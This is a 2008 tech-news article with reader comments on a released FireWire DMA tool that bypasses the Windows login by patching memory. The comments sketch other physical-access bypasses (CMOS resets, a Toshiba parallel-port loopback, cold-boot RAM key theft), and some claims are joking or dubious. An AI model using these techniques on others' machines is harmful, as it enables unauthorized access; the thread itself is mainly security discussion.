Print 53 comment(s) - last by lexluthermiest.. on Mar 14 at 3:11 PM

New Zealand hacker releases source code to utility that reads password directly from memory

Exploiting a little known feature built into Firewire port specifications, Adam Boileau released the source code to a utility authored in 2006 that allows anyone to bypass the Windows Authentication dialog box on any PC with a Firewire port.

The tool is a simple, 200-line script written in the Python programming language exploits features built into Firewire that allow direct access to a computer’s memory.  By targeting specific places that Windows consistently stores its vital authentication functions, Boileau’s tool is able to overwrite Windows’ secured code with patches that skip Windows’ password check entirely.

Boileau says he decided to release the script now, two years after it was initially unveiled, because Microsoft had not acted to patch the vulnerability. Boileau considers his tool a “party-trick demo script thats been lying around my [home folder] for two years gathering dust,” and considers it “a pity to write code and have no one use it.”

“Besides,” says Boileau, “according to Microsoft's definition, it never was a Security Vulnerability anyway – screensavers and login prompts are … about the Feeling of Security.”

Boileau also notes that he’s seen others successfully modify the script to hack Windows Vista’s password-check code, as well as use a laptop’s PCMCIA port to plug in a Firewire card and attack the laptop after Windows auto-installed the card’s drivers.

It’s important to note that Firewire’s provisions for direct memory access, called DMA, are useful in other contexts, like in the use of software debuggers. Nowadays, a sizable percentage of the world’s software checks for the presence of programs monitoring memory directly – which is what a debugger does – and will frequently act differently or refuse to start up if it detects their presence.

Firewire ports are therefore usable as high-speed debugging devices, allowing developers and hackers alike to passively monitor anywhere in a computer’s memory and make changes where needed, whether its reprogramming a password check or seeding buggy software with correct data. It might also allow forensic investigators to grab an encrypted hard drive’s decryption key directly from memory, while the computer is running.

Also important is that the same technique has been known to work on other operating systems, including Mac OS X and Linux – and in fact some people have used modified iPods to run Firewire DMA attacks on the fly.

Common security thought dictates that a computer is essentially lost if it is in your opponent’s possession, and that security on a physical machine will be subverted with time: for computers equipped with Firewire, the thought couldn’t be more true.

Comments     Threshold

This article is over a month old, voting and posting comments is disabled

By Beefy6969 on 3/7/2008 9:47:28 PM , Rating: 2
aww shiet...i better enable my bios password then. LOL

RE: sigh
By sandytheguy on 3/7/2008 10:17:45 PM , Rating: 5
Then I'll just reset your cmos.

RE: sigh
By sgtdisturbed47 on 3/7/2008 10:26:28 PM , Rating: 2
Then I'll just keep the computer in a vault room, like they do with servers in internet PC cafes lol not really, but seriously, it's very easy to get around Windows security features.

RE: sigh
By eman7613 on 3/8/2008 12:16:11 AM , Rating: 2
actualy, if its a laptop reseting the cmos wont do anything, although bying a new bios chip and switching them out will.

RE: sigh
By zshift on 3/8/2008 10:30:08 AM , Rating: 2
actually, thats not completely true. I work at best buy and we had a customer that returned a laptop because it "didn't work." turns out they apparently forgot their bios password, so i opened the laptop and reset the cmos and low and behold: the boot password was gone.

RE: sigh
By falacy on 3/8/2008 10:35:50 AM , Rating: 2
Then it wasn't a Toshiba.

Stinking Toshiba had to be tough on that sort of thing by installing a secondary IC that store the password, but doesn't come with a reset feature. Replacing the IC fixes the issue, but it's a surface mount IC and it's teeny tiny!

RE: sigh
By mindless1 on 3/8/2008 9:50:28 PM , Rating: 2
There's bound to be a way it can be done, they'd leave a backdoor long before having to desolder surface mounted PROMs just to wipe a password (for their own benefit even if they don't care about the owner).

RE: sigh
By Korvon on 3/9/2008 2:08:03 PM , Rating: 2
There are back doors to most every laptop. Older toshibas BIOS password can be bypassed by making a loopback on the parallel port. Several manufacturers have passwords that will bypass whatever you put in just in case you forget yours and call support. :P

RE: sigh
By kextyn on 3/8/2008 8:11:48 PM , Rating: 2
It depends on the laptop. But many of them store the passwords in a seperate chip now that would require some physical hacking to read the chip or replacement of the motherboard. Try getting into a Thinkpad that has all of the IBM/Windows standard passwords set (power on, bios supervisor, hard drive, etc.)

RE: sigh
By Samus on 3/9/2008 2:18:07 PM , Rating: 3
IBM Security Chips fix this. Among many other things, they monitor the memory space windows stores passwords in for phishing utilities like this script.

Once Again
By Flunk on 3/7/2008 11:01:00 PM , Rating: 5
Once again, there is not a computer system made with no security vulnerabilities. If you notice, this is actually the same issue that was reported with Mac OS the other day.

RE: Once Again
By Master Kenobi on 3/7/2008 11:59:03 PM , Rating: 4
This exploit actually works on any operating system. It exploits a flaw in the Firewire driver that allows it to interact with the system. Mac OSX, Windows, Linux, etc... The problem is with firewire. Now to put this into perspective, utilities have been available for years to 1-2 KO windows passwords (See: ERD Commander and various Ultimate Boot CD utilities).

Now to take a cheap shot though, Firewire is largely a product of Apple (some other vendors were involved later on, but Apple was the starter and biggest supporter of it). Apple has always been known for the security through obscurity model, and Firewire seems to fit in quite well :P

RE: Once Again
By dare2savefreedom on 3/8/2008 1:25:50 AM , Rating: 4
u r FOS

al gore created firewire.

next your going to tell me apple invented the internet and the open standard protocol that it uses known as appletalk.

RE: Once Again
By winterspan on 3/8/08, Rating: -1
RE: Once Again
By MAIA on 3/11/2008 1:50:37 PM , Rating: 3
Yep, i saw al gore creating firewire as well. It's like a wire with lots of fire.

He did the same thing with a wall, and called it firewall ...

RE: Once Again
By Polynikes on 3/8/2008 11:28:08 AM , Rating: 2
Apple was the starter and biggest supporter of it). Apple has always been known for the security through obscurity model, and Firewire seems to fit in quite well :P

Ain't that the truth. Mac OS is much more secure than Windows! Steve Jobs & Co would never mislead the public.

RE: Once Again
By Hare on 3/8/08, Rating: -1
RE: Once Again
By TomZ on 3/8/2008 1:29:00 PM , Rating: 3
And yes. If you look at the track record of Mac OS X vs. Windows it's quite clear that it's more secure.

Are you making a joke? Or are you just unaware of the security statistics of the current versions of OSX and Windows (Vista)? Vista is trouncing OSX.

RE: Once Again
By Hare on 3/8/2008 2:07:54 PM , Rating: 1
Leopard was just announced so it's a bit difficult to make any direct comparisons between latest operating systems. I was more or less comparing Mac OS X vs Win XP/Vista (long term).

I personally use Vista 95% of the time (like it a lot) and consider it as or more secure than Mac OS X. The problem is that the OS itself doesn't make a system either secure or unsecure (when the system is used by the average consumer). Unfortunately viruses and malware target mainly Windows machines so problems in Mac OS X are rarely exploited (this is something that you can't find in Secunia statistics). There's hardly any malware for Macs (open windows don't matter that much if you are living in a nice neighbourhood).

Security statistics for 2007
Mac OS X (26 advisories, none critical)
Vista (17 advisories, few critical/extremely critical)
Windows XP (30 advisories, many critical/extremely critical)

By GTVic on 3/8/2008 4:49:58 AM , Rating: 2
Would it work on a domain password or just local account passwords?

RE: Domain
By rninneman on 3/8/2008 10:34:58 AM , Rating: 2
It works on any password that is stored in RAM. So basically it works on just about everything.

RE: Domain
By zshift on 3/8/2008 10:37:26 AM , Rating: 2
I'm pretty sure that this trick wouldn't work for domains because of the fact that the domain password isn't stored on the client, so the script would be uselessly searching for a password that doesn't exist (on the current system). you'd have to run the script on the machine hosting passwords for the domain.

RE: Domain
By isorfir on 3/8/2008 3:53:01 PM , Rating: 1
I don't think that's true, since I can log into the domain accounts on my office laptops while not connected to the domain, so it has to be stored on the client.

RE: Domain
By Yawgm0th on 3/8/2008 7:28:39 PM , Rating: 1
If you have a local account created on that computer, even if for use in a domain, the username and password will be stored in the local SAM.

Unless you log into a domain using roaming profiles and do not have the domain account created locally on the PC and you have not logged onto that PC since the last time the RAM was cleared (in this case, you most likely would have had to turn the PSU off or disconnect power), the user account should be vulnerable to this attack.

RE: Domain
By mcmilljb on 3/8/2008 9:23:25 PM , Rating: 2
Wrong. Domain accounts are stored on the Domain Controller not locally. You won't be able to get the information unless the script knows where to find the password stored temporary for that session. You can disable caching of the Domain account credentials which will prevent any one that has logged into to the domain to log in again unless the person has network connectivity. SAM is not used locally for Domain accounts. When you're using a Domain, the password is hashed for being sent to the DC so I assume you would need to be able to undo the hash to even read the password. Plus the DC sends access tickets, which allow it permission to resources.

RE: Domain
By TomCorelis on 3/9/2008 12:11:49 AM , Rating: 2
It bypasses the password scheme entirely. I'm not sure whether it would create a proper login token for a domain.

RE: Domain
By jimbojimbo on 3/10/2008 1:01:50 PM , Rating: 2
If you've read the article you'd know that it won't matter where the hell the password is stored. If your computer is still on since the last time you logged in, your password is in the memory which this vulnerability takes advantage of. You could be logging into a domain hosted on Mars for all it cares.

Physical Control of Computer
By TomZ on 3/8/2008 7:38:40 AM , Rating: 4
If a hacker has physical control of your computer, i.e., they can plug something into the FireWire port, then you don't really have security, do you?

After all, that person could also use all other kinds of attacks on the machine, such as boot disks, cloning the HDD, or even stealing the computer.

Bottom line, you need to have physical control of your computer in order to have any kind of security.

RE: Physical Control of Computer
By walk2k on 3/8/2008 12:03:51 PM , Rating: 3
right... if they can get close enough to stick something in the fw port they could just smash it with a hammer or take a wizz in the cdrom hole or something.

RE: Physical Control of Computer
By mcmilljb on 3/8/2008 9:27:55 PM , Rating: 2
Actually you can disable the use of usb and firewire in a Active Directory environment(locally too but that's fun to do for lots of computers). Plus I don't need that tool to control that computer, I use the tool to get the password. Getting the password is important. Physical access control is the key to controlling your computer's security because you can do lots of things to a computer when it's in your hands.

By mindless1 on 3/8/2008 10:07:44 PM , Rating: 2
Security is a set of practices meant to deter based upon risk, never an absolute.

Using a firewire port is far faster and easier than a boot disk, HDD clone, or stealing the computer. It might be the data thieves ideal method to get in, copy, get out fast with either no detection or at least to have acquired the target and be leaving the area.

It doesn't have to be the only way to get into a system, just a way someone else didn't anticipate. because in the real world, most computers that have a certain level of security are not guarded at Fort Knox.

By Sunday Ironfoot on 3/8/2008 5:17:25 AM , Rating: 2
I'm pretty sure this wouldn't be able to beat Windows BitLocker, or any other 'full' hard drive encryption technology, correct me if I'm wrong?

RE: BitLocker?
By Hare on 3/8/2008 8:19:39 AM , Rating: 2
It doesn't matter how much is encrypted since only your RAM is being read. I'm not 100% sure if the firewire hack works with bitlocker but I think it actually does.

At least the ram swap technique works

"Researchers claim they cracked an array of commonly-used encryption programs, including Microsoft's BitLocker, Apple's FileVault, TrueCrypt, and dm-crypt."

Basically the firewire trick is the same. It enables a user to gain direct access to RAM and read the encryption keys.

RE: BitLocker?
By winterspan on 3/8/2008 8:13:58 PM , Rating: 2
That RAM swap thing is crap, since you don't have any time to actually do it without being able to deep freeze the RAM to slow the data decay. And you can't just dip it into liquid nitrogen without having it crack and explode.

RE: BitLocker?
By Hare on 3/9/2008 5:21:26 AM , Rating: 2
You can also use a usb drive (minilinux) to boot the machine and simply read the memory from there. There's no need to even open the case.

RE: BitLocker?
By Etern205 on 3/8/2008 4:49:25 PM , Rating: 2
Here is another link and BitLocker is defeated...

By diegoaac on 3/8/2008 12:27:22 AM , Rating: 2
That is exactly the reason why the macbook air doesn't have firewire: Cheers to apple for create the most secure computer in the world!!!!

That trick is almost as old as the firewire specifications. What I really want to see is some article saying something like: Chinese dissidents hack the world top 10 supercomputers using and only an ipod with a custom fpga infiniband interface (just because that kind of articles always include ipods for some strange reason)


By SlyNine on 3/8/2008 1:00:14 AM , Rating: 2
At least it's harder then deleting a .PWL file.

By dare2savefreedom on 3/8/2008 1:29:30 AM , Rating: 2
I can't see where the link for the tool is...
someone help xD

Put in to good use?
By Etern205 on 3/8/2008 4:42:57 PM , Rating: 2
This tool can be helpful for computer technicans who are trying to fix computers where customer comes in and forgot their passwords.

In XP if you forgot your password,there is a back door way to bypassed and since almost everyone knew about it, M$ changed it with Vista.

Breadth of Exploit
By habibo on 3/10/2008 4:46:49 PM , Rating: 2
Does this affect Speak 'N' Spells, too? That's where I do the majority of my computing these days...

By vladio on 3/10/2008 5:56:53 PM , Rating: 2
We badly need new Law.
If MS (or any other company) make $$$ from there product?
they muct be reponsible !!
I mean Accountable for there staff
(products, services. etc.) and they have to pay for it?
if they sell "crap" [pardme my freanch]
How about...
$1 million firts day, $2 million second, $4 3-td day,
and so on ?
If Merk start sellin "crap" ... it will be respond from autorities, [and it shoud !!]
why not apply the same rules ?!

Not a problem...
By Bonrock on 3/7/08, Rating: -1
RE: Not a problem...
By napalmjack on 3/7/2008 11:13:21 PM , Rating: 2
Sure about that?

RE: Not a problem...
By ProviaFan on 3/7/2008 11:22:16 PM , Rating: 4
Anyone who works with digital audio or video knows that you are clueless.

RE: Not a problem...
By lexluthermiester on 3/14/2008 3:11:11 PM , Rating: 2
I don't use firewire and never will and I work with audio and video all the time. USB can be found on every machine sold today, were as firewire is not so wide spread.

RE: Not a problem...
By omnicronx on 3/7/2008 11:29:18 PM , Rating: 2
Many laptops include firewire.. I think every Mac includes one.

RE: Not a problem...
By Master Kenobi on 3/8/2008 12:01:07 AM , Rating: 2
All Mac's, Sony's, and many HP/Dell systems include a 4-pin firewire with desktop models possibly including a 6-pin port.

RE: Not a problem...
By JoshuaBuss on 3/8/2008 1:39:58 AM , Rating: 2
not the macbook air.. hehe

RE: Not a problem...
By omnicronx on 3/8/2008 1:19:46 PM , Rating: 2
Exactly, and this is why it should be a big concern. Looking at many workplaces, most people with a high positions have laptops. Think about the sensitive information that could be pulled without needing hardcore equipment.

RE: Not a problem...
By Ochophosphate on 3/8/2008 9:12:36 AM , Rating: 2
as well as use a laptop’s PCMCIA port to plug in a Firewire card and attack the laptop after Windows auto-installed the card’s drivers.

Even without an available firewire port, looks like they can just add their own. Sounding like more of a problem yet?

RE: Not a problem...
By Melted Rabbit on 3/8/2008 1:39:54 PM , Rating: 2
This is less of a flaw on the part of Apple and Firewire as much as a design flaw in the PCI standard which Intel designed. There is no way to fix this flaw with PCI easily, as the PCI standard has no kind of security system. By default, all PCI peripherals can have read/write access to the entire memory space of the computer. This exploit would be possible, but harder to do, with flash and an FPGA on a PCI card, and with no Firewire involved. Also systems with just PCI and those with PCI and PCI Express are both vulnerable to this exploit.

One workaround for Firewire is to let the Firewire bus access a smaller virtual address space instead of the entire actual address space of the computer. Then this particular attack could be avoided. The PowerMac G5 and Sun workstations fix the flaw in this way. I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work. Intel would like to see Firewire dead, so don't expect this fix on an Intel chipset or processor, ever. AMD probably doesn't have the engineers to add a fix like this to their offerings.

The best solution for this problem with PCI is to come up with a new bus standard not software compatible with PCIe that has a security model. It should also address some of intentional shortcomings of PCIe, like being a peer to peer bus instead of the master-slave setup currently present in PCIe. It should also add the ability to route between nodes, which PCIe also cannot do. Intel intentionally left the last two mentioned features out to make a general purpose PC the only feasible option for computing instead of smaller, specialized computers being an option for a user.

RE: Not a problem...
By DragonMaster0 on 3/9/2008 8:29:09 PM , Rating: 2
I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work.

I don't know any north bridges with on-chip firewire (maybe they do now, but I doubt). Firewire is connected to a separate controller(usually a VIA or TI) on the PCI bus, just like a network chip. These would need to block the RAM area in question.

Intel would like to see Firewire dead

Obviously, since it doesn't load the CPU...

"And boy have we patented it!" -- Steve Jobs, Macworld 2007

Copyright 2016 DailyTech LLC. - RSS Feed | Advertise | About Us | Ethics | FAQ | Terms, Conditions & Privacy Information | Kristopher Kubicki